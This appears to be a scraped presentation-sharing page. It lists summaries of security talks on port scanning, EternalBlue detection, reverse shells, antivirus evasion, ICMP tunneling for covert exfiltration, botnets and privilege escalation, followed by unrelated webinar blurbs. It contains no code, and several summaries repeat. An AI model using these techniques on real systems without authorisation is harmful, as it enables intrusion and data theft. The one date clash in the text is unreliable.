- Diana Whitney is an IT security specialist who has worked at EWA-Canada since 2015 in their payment assurance lab testing PCI standards. She holds CySA+ and PenTest+ certifications.
- An initial Nmap scan was run on 10.10.10.40 to discover open ports and services. This revealed ports 139, 445, 135, and 49152-7 were open, indicating SMB services.
- Further Nmap scripts identified the host OS as Windows 7 Pro and its security mode. Scanning all 65535 ports found additional open ports.
- Nmap vulnerability scripts detected a positive result for CVE-2017-0143, the EternalBlue SMB exploit.
- Searchsploit was used
Quick talk on how to leverage scapy-ssl_tls to perform TLS 1.3 testing. Covers which area of the stack are less vulnerable with TLS 1.3 as opposed to 1.2.
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsBishop Fox
Learn the basics of network penetration testing success - an introduction to the top three tools that will help you on your security journey: Nmap, Netcat, and Metasploit. See how to use Nmap both for port scanning and vulnerability discovery. You'll also learn how to use Netcat to grab banners, make HTTP requests, and create both reverse and bind shells. Finally, we’ll learn the ins and outs of Metasploit, including how to integrate our Nmap scan results for even more ownage and using the built-in exploits to get shells.
At the end of this, you will be port scanning, creating payloads, and popping shells. This technical workshop is designed to familiarize you with the necessary tools to continue your ethical hacking journey. From here, take your l33t new skillz and apply them to Capture The Flag (CTF) competitions or scanning your home network for vulnerabilities.
(This was originally presented on February 22, 2010 at Day of Shecurity Boston 2019).
This document summarizes a presentation about pentesting custom TLS stacks. It discusses using the scapy-ssl_tls tool to craft and analyze TLS packets in order to evaluate the security of custom TLS implementations. The presentation covers TLS protocol basics, features of scapy-ssl_tls like packet parsing and crypto hooks, and techniques for analyzing areas like supported versions/ciphers, the TLS state machine, Diffie-Hellman parameters, side channels, fragmentation, and more. It aims to provide a way to efficiently reproduce TLS attacks and help test responses to vulnerabilities.
BSides Rochester 2018: Esteban Rodriguez: Ducky In The Middle: Injecting keys...JosephTesta9
This document summarizes Esteban Rodriguez's talk on injecting keystrokes into plaintext protocols. It discusses how protocols like VNC, HippoRemote, and early versions of Synergy sent keystrokes in plaintext, allowing them to be intercepted using tools like Wireshark. It then demonstrates how intercepted keystrokes could be cracked, monitored, or injected using tools like Metasploit, custom Python scripts, and rogue Synergy servers implemented with Dissonance. Mitigations discussed include encrypting protocols with SSL and verifying server fingerprints. The overall message is that encryption is important and security research helps improve protocols.
- Diana Whitney is an IT security specialist who has worked at EWA-Canada since 2015 in their payment assurance lab testing PCI standards. She holds CySA+ and PenTest+ certifications.
- An initial Nmap scan was run on 10.10.10.40 to discover open ports and services. This revealed ports 139, 445, 135, and 49152-7 were open, indicating SMB services.
- Further Nmap scripts identified the host OS as Windows 7 Pro and its security mode. Scanning all 65535 ports found additional open ports.
- Nmap vulnerability scripts detected a positive result for CVE-2017-0143, the EternalBlue SMB exploit.
- Searchsploit was used
Quick talk on how to leverage scapy-ssl_tls to perform TLS 1.3 testing. Covers which area of the stack are less vulnerable with TLS 1.3 as opposed to 1.2.
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsBishop Fox
Learn the basics of network penetration testing success - an introduction to the top three tools that will help you on your security journey: Nmap, Netcat, and Metasploit. See how to use Nmap both for port scanning and vulnerability discovery. You'll also learn how to use Netcat to grab banners, make HTTP requests, and create both reverse and bind shells. Finally, we’ll learn the ins and outs of Metasploit, including how to integrate our Nmap scan results for even more ownage and using the built-in exploits to get shells.
At the end of this, you will be port scanning, creating payloads, and popping shells. This technical workshop is designed to familiarize you with the necessary tools to continue your ethical hacking journey. From here, take your l33t new skillz and apply them to Capture The Flag (CTF) competitions or scanning your home network for vulnerabilities.
(This was originally presented on February 22, 2010 at Day of Shecurity Boston 2019).
This document summarizes a presentation about pentesting custom TLS stacks. It discusses using the scapy-ssl_tls tool to craft and analyze TLS packets in order to evaluate the security of custom TLS implementations. The presentation covers TLS protocol basics, features of scapy-ssl_tls like packet parsing and crypto hooks, and techniques for analyzing areas like supported versions/ciphers, the TLS state machine, Diffie-Hellman parameters, side channels, fragmentation, and more. It aims to provide a way to efficiently reproduce TLS attacks and help test responses to vulnerabilities.
BSides Rochester 2018: Esteban Rodriguez: Ducky In The Middle: Injecting keys...JosephTesta9
This document summarizes Esteban Rodriguez's talk on injecting keystrokes into plaintext protocols. It discusses how protocols like VNC, HippoRemote, and early versions of Synergy sent keystrokes in plaintext, allowing them to be intercepted using tools like Wireshark. It then demonstrates how intercepted keystrokes could be cracked, monitored, or injected using tools like Metasploit, custom Python scripts, and rogue Synergy servers implemented with Dissonance. Mitigations discussed include encrypting protocols with SSL and verifying server fingerprints. The overall message is that encryption is important and security research helps improve protocols.
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Ravi Rajput
As every coin has two side as a same way we know only the single side of Nmap which is port scanning.
While researching I found that a lot more other than port scanning and banner grabbing can be done with the use of Nmap.
We can use Nmap for web application pen-testing and exploitation too. Yeah it won't work as efficiently as of MSF.
This can replace the use of acunetix and other paid version scanner.
Joseph Salowey, Tableau Software
Transport Layer Security (TLS) 1.3 is almost here. The protocol that protects most of the Internet secure connections is getting the biggest ever revamp, and is losing a round-trip. We will explore differences between TLS 1.3 and previous versions in detail, focusing on the performance and security improvements of the new protocol as well as some of the challenges we face around securely implementing new features such as 0-RTT resumption.
- Laverna is a note taking application that stores encrypted notes locally in the browser using JavaScript rather than on a remote server.
- It uses Markdown formatting and encrypts notes using PBKDF2 before optionally syncing them to services like RemoteStorage.io or Dropbox.
- To use Laverna, it must be cloned from GitHub and built using Node.js, bower, and grunt with encryption handled entirely by the client side application.
Mixing performance, configurability, density, and security at scale has, historically, been hard with PHP. Early approaches have involved CGIs, suhosin, or multiple Apache instances. Then came PHP-FPM. At Pantheon, we've taken PHP-FPM, integrated it with cgroups, namespaces, and systemd socket activation. We use it to deliver all of our goals at unheard-of densities: thousands and thousands of isolated pools per box.
Watch how it's configured and see PHP-FPM pools start real-time to serve different Drupal sites as requests come into a server.
All of our tools for this are open-source and usable on your own virtual machines and hardware.
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...Alexandre Moneger
This presentation shows that code coverage guided fuzzing is possible in the context of network daemon fuzzing.
Some fuzzers are blackbox while others are protocol aware. Even ones which are made protocol aware, fuzzer writers typically model the protocol specification and implement packet awareness logic in the fuzzer. Unfortunately, just because the fuzzer is protocol aware, it does not guarantee that sufficient code paths have been reached.
The presentation deals with specific scenarios where the target protocol is completely unknown (proprietary) and no source code or protocol specs are accessible. The tool developed builds a feedback loop between the client and the server components using the concept of "gate functions". A gate function triggers monitoring. The pintool component tracks the binary code coverage for all the functions untill it reaches an exit gate. By instrumenting such gated functions, the tool is able to measure code coverage during packet processing.
The document provides instructions for setting up an OpenVPN server to allow both Linux and Mac OS X clients to securely connect. It describes generating certificates and keys, configuring the OpenVPN server, and then configuring Linux and Mac OS X clients to connect to the server. The key steps are:
1) Generate certificates and keys on the server using the OpenVPN easy-rsa scripts.
2) Configure the OpenVPN server configuration file and required files.
3) Distribute client certificates to Linux and Mac clients and configure the clients.
4) Start the OpenVPN server and test connectivity between clients and the server network.
This document discusses using ICMP tunneling to covertly transmit SSH traffic between two machines without detection. It provides instructions for setting up an ICMP tunnel using the hans tool, capturing traffic before and after establishing the tunnel, and comparing the captures to see how the SSH traffic is now encapsulated in ICMP packets instead of using TCP port 22. The main objective is to demonstrate how a benign protocol like ICMP can be abused to exfiltrate data without detection by encapsulating other protocols within it.
1. The document discusses TLS session resumption across multiple servers using ngx_lua. It introduces TLS handshakes and session resumption.
2. It describes how ngx_lua can implement cross-host session resumption via session IDs and tickets through Lua scripts while maintaining performance and forward secrecy. Small patches are needed to Nginx/OpenSSL.
3. Key aspects covered are a memcached session store interface, non-blocking I/O, ticket key encryption and rotation, and configuration via Lua scripts without modifying Nginx core. This allows cross-host session resumption compatible with TLSv1.3.
Nmap is a security scanning tool that can discover open ports, scan for services, and determine operating systems on a network. It works by sending packets to IP addresses and analyzing the responses to infer information about the target system, such as which ports are open or closed and what services are running. Nmap displays this information to the user and can be run from both graphical and command line interfaces on many operating systems. While useful for security auditing, Nmap could also enable hacking if used without permission on a network.
The document discusses DHCP security spoofing vs snooping. DHCP snooping is a method used on switches to prevent DHCP spoofing attacks by monitoring DHCP packets and building a DHCP snooping binding database to ensure only authorized DHCP servers can respond to requests. The document provides configuration examples for enabling DHCP snooping on a switch and designating trusted ports.
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCanSecWest
The document summarizes a presentation on analyzing the security of QEMU. It introduces QEMU and describes its main attack surfaces, including device emulation, virtio, third-party libraries, VNC, Spice, and QMP. Examples of vulnerabilities found in Cirrus VGA, virtio filesystem, virglrenderer library, VNC, and QMP are provided. The document concludes with thoughts on efficient security analysis, noting that combining in-depth knowledge with fuzzing is most effective for finding bugs in complex software like QEMU.
This document summarizes a presentation on evading antivirus detection. It discusses how antivirus has gotten better at detecting old techniques, and introduces newer tools and methods for generating payloads that can bypass antivirus software, including Veil, Hyperion, and writing your own custom stagers and payloads. It also recommends building your own antivirus lab to reliably test new payloads before deployment.
This document provides an overview and agenda for a training on the Nmap Scripting Engine (NSE). It begins with a 10 minute introduction to Nmap, covering what Nmap is used for and some basic scan options. Next, it spends 20 minutes reviewing the existing NSE script categories and how to use available scripts, demonstrating two sample scripts. Finally, it dedicates 20 minutes to explaining how to write your own NSE script, including the basic structure and providing an example of writing a script to find the website title.
For a college course -- CNIT 141: Cryptography for Computer Networks, at City College San Francisco
Based on "Serious Cryptography: A Practical Introduction to Modern Encryption", by Jean-Philippe Aumasson, No Starch Press (November 6, 2017), ISBN-10: 1593278268 ISBN-13: 978-1593278267
Instructor: Sam Bowne
More info: https://samsclass.info/141/141_S19.shtml
Nmap is a network scanning tool that can discover hosts and services on a network. It can scan TCP and UDP ports, perform OS and version detection, and has both command line and GUI interfaces. Nmap allows specification of target hosts by IP address, CIDR notation for subnets, or hostname. It provides information about open ports and common services, and can detect vulnerabilities.
The document describes XenTT, a tool for deterministic replay in the Xen virtualization platform. XenTT records the execution history of a guest VM, including nondeterministic events like interrupts and I/O. It then replays the execution deterministically to allow for repeatable systems analysis. This is done by making the CPU and execution environment deterministic during replay and precisely recording the timing and location of nondeterministic events during the original run.
Last mile authentication problem: Exploiting the missing link in end-to-end s...Priyanka Aash
"With ""Trust none over the Internet"" mindset, securing all communication between a client and a server with protocols such as TLS has become a common practice. However, while the communication over Internet is routinely secured, there is still an area where such security awareness is not seen: inside individual computers, where adversaries are often not expected.
This talk discusses the security of various inter-process communication (IPC) mechanisms that local processes and applications use to interact with each other. In particular, we show IPC-related vulnerabilities that allow a non-privileged process to steal passwords stored in popular password managers and even second factors from hardware tokens. With passwords being the primary way of authentication, the insecurity of this ""last mile"" causes the security of the rest of the communication strands to be obsolete. The vulnerabilities that we demonstrate can be exploited on multi-user computers that may have processes of multiple users running at the same time. The attacker is a non-privileged user trying to steal sensitive information from other users. Such computers can be found in enterprises with centralized access control that gives multiple users access to the same host. Computers with guest accounts and shared computers at home are similarly vulnerable."
Network Scanning Phases and Supporting ToolsJoseph Bugeja
This presentation focuses on the network penetration scanning phase. It introduces tools and techniques that professional pen-testers and ethical hackers need to master to find target machines, openings on those targets and vulnerabilities.
The Slides deck contains Network penetration testing requirements & Tools used in real world pentesting. For Demo purposes, I had used a vulnhub machine called Metasploitable 2 for testing purposes. Looking into various Ports and Services Vulnerabilities using Kali open source tools.
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Ravi Rajput
As every coin has two side as a same way we know only the single side of Nmap which is port scanning.
While researching I found that a lot more other than port scanning and banner grabbing can be done with the use of Nmap.
We can use Nmap for web application pen-testing and exploitation too. Yeah it won't work as efficiently as of MSF.
This can replace the use of acunetix and other paid version scanner.
Joseph Salowey, Tableau Software
Transport Layer Security (TLS) 1.3 is almost here. The protocol that protects most of the Internet secure connections is getting the biggest ever revamp, and is losing a round-trip. We will explore differences between TLS 1.3 and previous versions in detail, focusing on the performance and security improvements of the new protocol as well as some of the challenges we face around securely implementing new features such as 0-RTT resumption.
- Laverna is a note taking application that stores encrypted notes locally in the browser using JavaScript rather than on a remote server.
- It uses Markdown formatting and encrypts notes using PBKDF2 before optionally syncing them to services like RemoteStorage.io or Dropbox.
- To use Laverna, it must be cloned from GitHub and built using Node.js, bower, and grunt with encryption handled entirely by the client side application.
Mixing performance, configurability, density, and security at scale has, historically, been hard with PHP. Early approaches have involved CGIs, suhosin, or multiple Apache instances. Then came PHP-FPM. At Pantheon, we've taken PHP-FPM, integrated it with cgroups, namespaces, and systemd socket activation. We use it to deliver all of our goals at unheard-of densities: thousands and thousands of isolated pools per box.
Watch how it's configured and see PHP-FPM pools start real-time to serve different Drupal sites as requests come into a server.
All of our tools for this are open-source and usable on your own virtual machines and hardware.
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...Alexandre Moneger
This presentation shows that code coverage guided fuzzing is possible in the context of network daemon fuzzing.
Some fuzzers are blackbox while others are protocol aware. Even ones which are made protocol aware, fuzzer writers typically model the protocol specification and implement packet awareness logic in the fuzzer. Unfortunately, just because the fuzzer is protocol aware, it does not guarantee that sufficient code paths have been reached.
The presentation deals with specific scenarios where the target protocol is completely unknown (proprietary) and no source code or protocol specs are accessible. The tool developed builds a feedback loop between the client and the server components using the concept of "gate functions". A gate function triggers monitoring. The pintool component tracks the binary code coverage for all the functions untill it reaches an exit gate. By instrumenting such gated functions, the tool is able to measure code coverage during packet processing.
The document provides instructions for setting up an OpenVPN server to allow both Linux and Mac OS X clients to securely connect. It describes generating certificates and keys, configuring the OpenVPN server, and then configuring Linux and Mac OS X clients to connect to the server. The key steps are:
1) Generate certificates and keys on the server using the OpenVPN easy-rsa scripts.
2) Configure the OpenVPN server configuration file and required files.
3) Distribute client certificates to Linux and Mac clients and configure the clients.
4) Start the OpenVPN server and test connectivity between clients and the server network.
This document discusses using ICMP tunneling to covertly transmit SSH traffic between two machines without detection. It provides instructions for setting up an ICMP tunnel using the hans tool, capturing traffic before and after establishing the tunnel, and comparing the captures to see how the SSH traffic is now encapsulated in ICMP packets instead of using TCP port 22. The main objective is to demonstrate how a benign protocol like ICMP can be abused to exfiltrate data without detection by encapsulating other protocols within it.
1. The document discusses TLS session resumption across multiple servers using ngx_lua. It introduces TLS handshakes and session resumption.
2. It describes how ngx_lua can implement cross-host session resumption via session IDs and tickets through Lua scripts while maintaining performance and forward secrecy. Small patches are needed to Nginx/OpenSSL.
3. Key aspects covered are a memcached session store interface, non-blocking I/O, ticket key encryption and rotation, and configuration via Lua scripts without modifying Nginx core. This allows cross-host session resumption compatible with TLSv1.3.
Nmap is a security scanning tool that can discover open ports, scan for services, and determine operating systems on a network. It works by sending packets to IP addresses and analyzing the responses to infer information about the target system, such as which ports are open or closed and what services are running. Nmap displays this information to the user and can be run from both graphical and command line interfaces on many operating systems. While useful for security auditing, Nmap could also enable hacking if used without permission on a network.
The document discusses DHCP security spoofing vs snooping. DHCP snooping is a method used on switches to prevent DHCP spoofing attacks by monitoring DHCP packets and building a DHCP snooping binding database to ensure only authorized DHCP servers can respond to requests. The document provides configuration examples for enabling DHCP snooping on a switch and designating trusted ports.
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCanSecWest
The document summarizes a presentation on analyzing the security of QEMU. It introduces QEMU and describes its main attack surfaces, including device emulation, virtio, third-party libraries, VNC, Spice, and QMP. Examples of vulnerabilities found in Cirrus VGA, virtio filesystem, virglrenderer library, VNC, and QMP are provided. The document concludes with thoughts on efficient security analysis, noting that combining in-depth knowledge with fuzzing is most effective for finding bugs in complex software like QEMU.
This document summarizes a presentation on evading antivirus detection. It discusses how antivirus has gotten better at detecting old techniques, and introduces newer tools and methods for generating payloads that can bypass antivirus software, including Veil, Hyperion, and writing your own custom stagers and payloads. It also recommends building your own antivirus lab to reliably test new payloads before deployment.
This document provides an overview and agenda for a training on the Nmap Scripting Engine (NSE). It begins with a 10 minute introduction to Nmap, covering what Nmap is used for and some basic scan options. Next, it spends 20 minutes reviewing the existing NSE script categories and how to use available scripts, demonstrating two sample scripts. Finally, it dedicates 20 minutes to explaining how to write your own NSE script, including the basic structure and providing an example of writing a script to find the website title.
For a college course -- CNIT 141: Cryptography for Computer Networks, at City College San Francisco
Based on "Serious Cryptography: A Practical Introduction to Modern Encryption", by Jean-Philippe Aumasson, No Starch Press (November 6, 2017), ISBN-10: 1593278268 ISBN-13: 978-1593278267
Instructor: Sam Bowne
More info: https://samsclass.info/141/141_S19.shtml
Nmap is a network scanning tool that can discover hosts and services on a network. It can scan TCP and UDP ports, perform OS and version detection, and has both command line and GUI interfaces. Nmap allows specification of target hosts by IP address, CIDR notation for subnets, or hostname. It provides information about open ports and common services, and can detect vulnerabilities.
The document describes XenTT, a tool for deterministic replay in the Xen virtualization platform. XenTT records the execution history of a guest VM, including nondeterministic events like interrupts and I/O. It then replays the execution deterministically to allow for repeatable systems analysis. This is done by making the CPU and execution environment deterministic during replay and precisely recording the timing and location of nondeterministic events during the original run.
Last mile authentication problem: Exploiting the missing link in end-to-end s...Priyanka Aash
"With ""Trust none over the Internet"" mindset, securing all communication between a client and a server with protocols such as TLS has become a common practice. However, while the communication over Internet is routinely secured, there is still an area where such security awareness is not seen: inside individual computers, where adversaries are often not expected.
This talk discusses the security of various inter-process communication (IPC) mechanisms that local processes and applications use to interact with each other. In particular, we show IPC-related vulnerabilities that allow a non-privileged process to steal passwords stored in popular password managers and even second factors from hardware tokens. With passwords being the primary way of authentication, the insecurity of this ""last mile"" causes the security of the rest of the communication strands to be obsolete. The vulnerabilities that we demonstrate can be exploited on multi-user computers that may have processes of multiple users running at the same time. The attacker is a non-privileged user trying to steal sensitive information from other users. Such computers can be found in enterprises with centralized access control that gives multiple users access to the same host. Computers with guest accounts and shared computers at home are similarly vulnerable."
Network Scanning Phases and Supporting ToolsJoseph Bugeja
This presentation focuses on the network penetration scanning phase. It introduces tools and techniques that professional pen-testers and ethical hackers need to master to find target machines, openings on those targets and vulnerabilities.
The Slides deck contains Network penetration testing requirements & Tools used in real world pentesting. For Demo purposes, I had used a vulnhub machine called Metasploitable 2 for testing purposes. Looking into various Ports and Services Vulnerabilities using Kali open source tools.
Network scanning with Nmap for Noobs and Ninjas - This slide was presented at Null Delhi monthly security meet by Nikhil and Jayvardhan.
https://www.facebook.com/nullOwaspDelhi/
The document discusses using Nmap to perform network scanning and reconnaissance. It provides an overview of Nmap, describing common scan types like TCP and UDP scans. It also covers useful Nmap options for tasks like service and operating system detection. The document demonstrates the Nmap Scripting Engine for tasks like vulnerability scanning and brute force attacks. It provides examples of commands for different scan types and scripts.
Title: Hands on Penetration Testing 101 by Scott Sutherland & Karl Fosaaen
Abstract: The goal of this training is to introduce attendees to standard penetration test methodologies, tools, and techniques. Hands on labs will cover the basics of asset discovery, vulnerability enumeration, system penetration, privilege escalation, and bypassing end point protection. During the labs, common vulnerabilities will be leveraged to illustrate attack techniques, using freely available tools such as Nmap and Metasploit. This training will be valuable to anyone interested in gaining a better understanding of penetration testing or to system administrators trying to understand common attack approaches.
Empower yourself to see what's lurking on your network with our Nmap project presentation! This presentation delves into the world of port scanning with Nmap, the industry-standard tool. Explore how Nmap works, uncover different scanning techniques (SYN scan, UDP scan, etc.), and learn to identify open ports, potential vulnerabilities, and running services. Whether you're a network administrator, security professional, or simply curious about your network traffic, this presentation equips you with the skills to gain valuable insights into your network health. Visit us for more nmap project presentations, https://bostoninstituteofanalytics.org/cyber-security-and-ethical-hacking/
This document provides an overview of advanced scanning and exploitation techniques for security testing. It discusses using Nmap to scan for open ports and operating systems. The importance of local IP sweeping to find vulnerable systems on a local network is explained. Netcat is demonstrated as a simple way to create a remote shell on another system. Brief examples of shellcode and exploits that can be delivered through media files like JPGs and MP3s are also provided. The conclusion emphasizes that while this information is shown for educational purposes, actually exploiting systems without permission would be illegal.
Shmoocon Epilogue 2013 - Ruining security models with SSHAndrew Morris
This document summarizes how SSH can be used to compromise security in several ways:
1. Authentication can be bypassed by generating a public key on an attacker's machine and transferring it to a victim's machine to allow code execution without a password.
2. SSH allows file transfer and traffic tunneling which can be used to transfer tools, exfiltrate data, and bypass firewalls by tunneling any protocol over an SSH connection.
3. Dynamic tunneling with tools like SOCKS and Proxychains allows running scans, exploits, and other tools through an SSH connection without needing privileged access on the target.
This document discusses techniques for hunting bad guys on networks, including identifying client-side attacks, malware command and control channels, post-exploitation activities, and hunting artifacts. It provides examples of using DNS logs, firewall logs, HTTP logs, registry keys, installed software inventories, and the AMCache registry hive to look for anomalous behaviors that could indicate security compromises. The goal is to actively hunt for threats rather than just detecting known bad behaviors.
Chuck McAuley, Ixia Communications
The Mirai botnet has brought public awareness to the danger of poorly secured embedded devices. Its ability to propagate is fast and reliable. Its impact can be devastating and variants of it will be around for a long time. You need to identify it, stop it, and prevent its spread. I had the opportunity to become familiar with the structure, design, and weaknesses of Mirai and its variants. At this talk you'll learn how to detect members of the botnet, mess with them through various means and setup a safe live fire lab environment for your own amusement. I will demonstrate how to join a C2 server, how to collect new samples for study, and some changes that have occurred since release of the source code. By the end you'll be armed and ready to take the fight to these jerks. Unless you're a botnet operator. Then you'll learn about some of the mistakes you made.
This document provides an overview of Nmap Scripting Engine (NSE) for security researchers looking to build NSE scripts. It covers the anatomy of an NSE script including required components like metadata, categories, portrules and actions. It also provides tips for scriptors like specifying the script directory, using debugging mode, and updating the script database. The goal is to provide a kickstart for researchers to learn how to create NSE scripts and proofs-of-concept.
Nmap (Network Mapper} is and an Open Source utility which can quickly scan broad ranges of devices and provide valuable information about the devices on your network.It can be used for IT auditing and asset discovery as well as security profiling of the network.
The document discusses various phases of intrusion and techniques used by attackers:
1. Reconnaissance involves gathering information about the target through techniques like searching public databases, domain name records, and social engineering to map the network and discover vulnerabilities.
2. Scanning detects live machines, network topology, firewall configurations, applications, and vulnerabilities using tools like ping sweeps, traceroute, port scanning, and vulnerability scanners.
3. Gaining access exploits known vulnerabilities through buffer overflow attacks or by downloading exploits from hacker sites to compromise systems.
A penetration test involves four main phases: reconnaissance, scanning, exploitation, and maintaining access. In the reconnaissance phase, tools are used to gather information about the target system without authorization. Scanning identifies open ports and vulnerabilities. Exploitation attempts to gain unauthorized control of systems by exploiting vulnerabilities, such as using password crackers. Maintaining access involves creating backdoors for future unauthorized access, such as using network sniffing tools or installing rootkits. Popular tools used in penetration tests include Nmap for scanning, Metasploit for exploitation, and Netcat for creating backdoors. Defending against penetration tests requires monitoring information published online, properly configuring firewalls and access controls, patching systems, and using antivirus and intrusion detection software
As organizations assess the security of their information systems, the need for automation has become more and more apparent. Not only are organizations attempting to automate their assessments, the need is becoming more pressing to perform assessments centrally against large numbers of enterprise systems. Penetration testers can use this automation to make their post-exploitation efforts more thorough, repeatable, and efficient. Defenders need to understand the techniques attackers are using once an initial compromise has occurred so they can build defenses to stop the attacks. Microsoft's PowerShell scripting language has become the defacto standard for many organizations looking to perform this level of distributed automation. In this presentation James Tarala, of Enclave Security, will describe to students the enterprise capabilities PowerShell offers and show practical examples of how PowerShell can be used to perform large scale penetration tests of Microsoft Windows systems.
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
The document discusses exploiting vulnerabilities in wireless routers that have USB ports for sharing storage and printers. It describes conducting attacks against a D-Link wireless router to steal data, delete data, and implant backdoors by accessing the shared USB flash drive and printer through the router's vulnerable SharePort technology. The attacker scans the wireless network, identifies the router and connected USB devices, and then explores ways to hack into the shared resources and conduct unauthorized activities.
Scanning is the first phase of active hacking used to locate target systems and networks. It involves identifying live hosts, open ports, services, and OS details through techniques like ping sweeps, port scanning, banner grabbing, and vulnerability scanning. Enumeration occurs after scanning and is used to extract additional information like usernames, shares, and services. Specific enumeration techniques discussed include SNMP enumeration, which identifies device information by querying SNMP agents, and NetBIOS enumeration, which extracts Windows account and share details. Hacking tools mentioned that assist with scanning and enumeration include Nmap, SNMPUtil, DumpSec, and Hyena.
The document provides instructions on how to configure an SSH server on Linux, perform footprinting and reconnaissance, scanning tools and techniques, enumeration tools and techniques, password cracking techniques and tools, privilege escalation methods, and keylogging and hidden file techniques. It discusses active and passive footprinting, Nmap port scanning, NetBIOS and SNMP enumeration, Windows password hashes, the sticky keys method for privilege escalation, ActualSpy keylogging software, and hiding files using NTFS alternate data streams. Countermeasures for many of these techniques are also outlined.
This document discusses encrypting volumes with Barbican in OpenStack. It provides an introduction to Barbican and encryption, describes how Barbican works with Nova and Cinder to provide transparent encryption of volumes using LUKS, discusses some issues the presenter encountered integrating Barbican on OnRamp's private cloud and how they were resolved, and limitations to be aware of when using encrypted volumes. It concludes with a demo and Q&A.
DEF CON 23 - Rickey Lawshae - lets talk about soapFelipe Prado
This document discusses the Universal Plug and Play (UPnP) protocol and Simple Object Access Protocol (SOAP). It provides an overview of UPnP including discovery, description of devices and services, control of services via SOAP calls, and potential security issues. While UPnP aims to allow smart devices to easily communicate, the document notes that many devices have limited security which can lead to issues like command injection attacks.
UiPath Test Automation using UiPath Test Suite series, part 5DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 5. In this session, we will cover CI/CD with devops.
Topics covered:
CI/CD with in UiPath
End-to-end overview of CI/CD pipeline with Azure devops
Speaker:
Lyndsey Byblow, Test Suite Sales Engineer @ UiPath, Inc.
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
Best 20 SEO Techniques To Improve Website Visibility In SERPPixlogix Infotech
Boost your website's visibility with proven SEO techniques! Our latest blog dives into essential strategies to enhance your online presence, increase traffic, and rank higher on search engines. From keyword optimization to quality content creation, learn how to make your site stand out in the crowded digital landscape. Discover actionable tips and expert insights to elevate your SEO game.
Maruthi Prithivirajan, Head of ASEAN & IN Solution Architecture, Neo4j
Get an inside look at the latest Neo4j innovations that enable relationship-driven intelligence at scale. Learn more about the newest cloud integrations and product enhancements that make Neo4j an essential choice for developers building apps with interconnected data and generative AI.
UiPath Test Automation using UiPath Test Suite series, part 6DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
UiPath Test Automation with generative AI and Open AI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, a test automation solution, with Open AI advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Infrastructure Challenges in Scaling RAG with Custom AI modelsZilliz
Building Retrieval-Augmented Generation (RAG) systems with open-source and custom AI models is a complex task. This talk explores the challenges in productionizing RAG systems, including retrieval performance, response synthesis, and evaluation. We’ll discuss how to leverage open-source models like text embeddings, language models, and custom fine-tuned models to enhance RAG performance. Additionally, we’ll cover how BentoML can help orchestrate and scale these AI components efficiently, ensuring seamless deployment and management of RAG systems in the cloud.
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!SOFTTECHHUB
As the digital landscape continually evolves, operating systems play a critical role in shaping user experiences and productivity. The launch of Nitrux Linux 3.5.0 marks a significant milestone, offering a robust alternative to traditional systems such as Windows 11. This article delves into the essence of Nitrux Linux 3.5.0, exploring its unique features, advantages, and how it stands as a compelling choice for both casual users and tech enthusiasts.
Essentials of Automations: The Art of Triggers and Actions in FMESafe Software
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
GraphRAG for Life Science to increase LLM accuracyTomaz Bratanic
GraphRAG for life science domain, where you retriever information from biomedical knowledge graphs using LLMs to increase the accuracy and performance of generated answers
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?Speck&Tech
ABSTRACT: A prima vista, un mattoncino Lego e la backdoor XZ potrebbero avere in comune il fatto di essere entrambi blocchi di costruzione, o dipendenze di progetti creativi e software. La realtà è che un mattoncino Lego e il caso della backdoor XZ hanno molto di più di tutto ciò in comune.
Partecipate alla presentazione per immergervi in una storia di interoperabilità, standard e formati aperti, per poi discutere del ruolo importante che i contributori hanno in una comunità open source sostenibile.
